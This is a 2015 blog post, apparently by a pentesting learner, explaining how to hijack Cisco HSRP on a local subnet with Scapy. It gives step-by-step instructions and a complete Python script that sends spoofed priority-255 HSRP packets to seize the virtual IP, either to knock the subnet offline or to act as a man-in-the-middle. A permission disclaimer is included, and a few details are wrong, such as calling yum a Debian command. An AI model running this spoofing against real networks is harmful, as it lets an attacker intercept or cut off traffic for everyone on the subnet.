Monday, January 19, 2015

Simple Python: Pwning (Unauthenticated) HSRP

Hey all,

I'm just starting to learn some scripting in order to hone my skills at pentesting. I've decided to start with Python since it's simple and many pentesting tools are written in it.

This post is about using a Python tool called "Scapy" (link) to pwn HSRP. Scapy is capable of taking user input and generating packets of all varieties. By feeding Scapy the proper input, it can generate an HSRP packet every few seconds and redirect an HSRP VIP to... anywhere, really.

One use case is to redirect HSRP to an invalid IP, paralyzing a local subnet. A more interesting and devious use case is to redirect HSRP to your own local machine, turn on packet forwarding, and suddenly you're a man-in-the-middle (MitM) for everyone on your subnet.

Now, a little background. HSRP is Cisco's VIP (Virtual IP) solution. It's typically used by several routers to share an IP and allow for smooth transition if one of the routers suffers a failure. Routers will multicast on a subnet to in the hopes of reaching neighbors. Routers self-identify their 'priority,' (as well as other VIP qualities) which is a highest-wins integer.

By default, HSRP is authenticated with a simple text string of "cisco". A default authentication string is hardly better than nothing to protect from a bad actor. We'll assume here that HSRP is setup in this way. I'll see if I can tackle simple authenticated (string) or MD5 auth'd later.

NOTE: As with any tool, it can be misused. Only use tools such as this on networks you own or have received explicit, written permission to test on. I recommend using VirtualBox and GNS3 in order to give you a safe environment to play.

1. Start Wireshark (formally Ethereal) and watch the line. Wireshark is able to identify HSRP packets directly - look for Protocol = HSRP. Expand the "Cisco Hot Standby Router Protocol" inner layer and look for several items:
a) Group #
b) Virtual IP Address
c) Priority - Look through a few HSRP packets and find the highest priority. Our spoof packets will need to have a higher priority than what you find, else nothing will occur. My python program later uses 255 (the highest value) later, so this should be a non-issue.
d) Authentication Data (The default string is "cisco". If you see any other string here, you'll need to specify it when generating the HSRP spoofed packets)
e) Hellotime and hold-time
2. Download and install Scapy (if not already) on your Linux distro. It'll depend on your distro, but Debian-based systems can use: sudo yum -y install scapy

3. In a terminal window, create a file in some folder: vi

4. Check what interfaces you have with ifconfig

5. Paste this program into your new Python file:
print('Python script to redirect HSRP groups without security')

# Import Scapy functions
from scapy.all import *

# Gather information and set to variables
hsrpInterface = raw_input("What is your HSRP interface - note: get from ifconfig")
hsrpGroup = int(raw_input("What is the HSRP Group #?  "))
hsrpIP = raw_input("What is the HSRP Group Virtual IP?  ")
hsrpRepeat = int(raw_input("How often should the spoofed packets be sent (in seconds)?  "))
hsrpPriority = int("255")
hsrpSourceIP = raw_input("What should the source IP be?   ")

ip = IP(src=hsrpSourceIP, dst='')
udp = UDP()
hsrp = HSRP(group=hsrpGroup, priority=hsrpPriority, virtualIP=hsrpIP)
send(ip/udp/hsrp, iface=hsrpInterface, inter=hsrpRepeat, loop=1)

6. Run the program with sudo rights, so it has the ability to generate packets. The program will query you for all the information it requires, and then will start sending spoofed traffic.

Provided you input the correct information, any routers on the same subnet will see the new HSRP player and traffic will start to be redirected to the IP you specified.


No comments:

Post a Comment